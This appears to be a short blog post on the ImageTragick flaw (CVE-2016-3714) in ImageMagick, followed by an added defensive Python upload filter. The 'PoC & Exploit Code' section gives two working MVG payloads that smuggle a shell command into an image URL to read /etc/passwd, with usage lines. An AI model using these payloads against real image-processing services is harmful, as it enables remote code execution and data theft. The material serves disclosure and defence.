ImageTragick PoC

ImageMagick Is On Fire — CVE-2016-3714

There are multiple vulnerabilities in ImageMagick, a package commonly used by web services to process images. One of the vulnerabilities can lead to remote code execution (RCE) if you process user-submitted images. The exploit for this vulnerability is being used in the wild.

A number of image processing plugins depend on the ImageMagick library, including, but not limited to, PHP’s imagick, Ruby’s rmagick and paperclip, and Node.js’s imagemagick.

For more information about this vulnerability visit: https://imagetragick.com/ or this pastebin exploit.

PoC & Exploit Code

The exploit is trivial; give it a look:

  • convert

viewbox 0 0 1 1 image over 0,0 0,0 'https://voidsec.com/" || cat /etc/passwd && echo "0'
Usage: convert imagetragick.mvg out.png

  • identify

push graphic-context
viewbox 0 0 640 480
fill 'url(https://voidsec.com/logo.png"|cat "/etc/passwd)'
pop graphic-context

Usage: identify imagetragick.mvg
More PoCs can be found here.
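
A defensive pre-filter for the files shown above, as an added example (not code from the original post): it accepts an upload only if it starts with an allow-listed image signature, flags MVG primitives like those in the PoC files, and pins the ImageMagick coder with an explicit `png:`-style prefix. The accepted formats, function names and sample bytes are assumptions made for illustration.

```python
import re

# Signatures of the only formats this hypothetical upload handler accepts.
MAGIC = {
    b"\x89PNG\r\n\x1a\n": "png",
    b"\xff\xd8\xff": "jpeg",
    b"GIF87a": "gif",
    b"GIF89a": "gif",
}

# MVG drawing primitives that open the lines of the PoC files above.
MVG_HINTS = re.compile(
    rb"^\s*(push\s+graphic-context|viewbox\s+\d|fill\s+'url\()",
    re.IGNORECASE | re.MULTILINE,
)

# Constructed samples: a PNG header stub and a harmless MVG file.
SAMPLE_PNG = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
SAMPLE_MVG = (b"push graphic-context\nviewbox 0 0 640 480\n"
              b"fill 'url(https://example.invalid/logo.png)'\n"
              b"pop graphic-context\n")

def sniff_format(data: bytes):
    """Return the format name if data starts with an allowed signature, else None."""
    for magic, name in MAGIC.items():
        if data.startswith(magic):
            return name
    return None

def looks_like_mvg(data: bytes) -> bool:
    """Heuristic for logging: a line in the first 4 KiB opens with an MVG primitive."""
    return MVG_HINTS.search(data[:4096]) is not None

def safe_convert_args(data: bytes, src_path: str, dst_path: str):
    """Build an argv for convert, or raise ValueError for a rejected upload.

    src_path and dst_path are assumed to be server-generated, never user-supplied.
    """
    fmt = sniff_format(data)
    if fmt is None:
        reason = "MVG content" if looks_like_mvg(data) else "unknown signature"
        raise ValueError(f"rejected upload: {reason}")
    # The "png:/path" form names the coder explicitly, so ImageMagick does not
    # pick one from the file's content or extension.
    return ["convert", f"{fmt}:{src_path}", f"png:{dst_path}"]
```

The signature check is the gate; the MVG heuristic only improves the rejection reason for logging and alerting, and should be paired with a `policy.xml` that disables the MVG, MSL, URL, HTTPS and EPHEMERAL coders.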
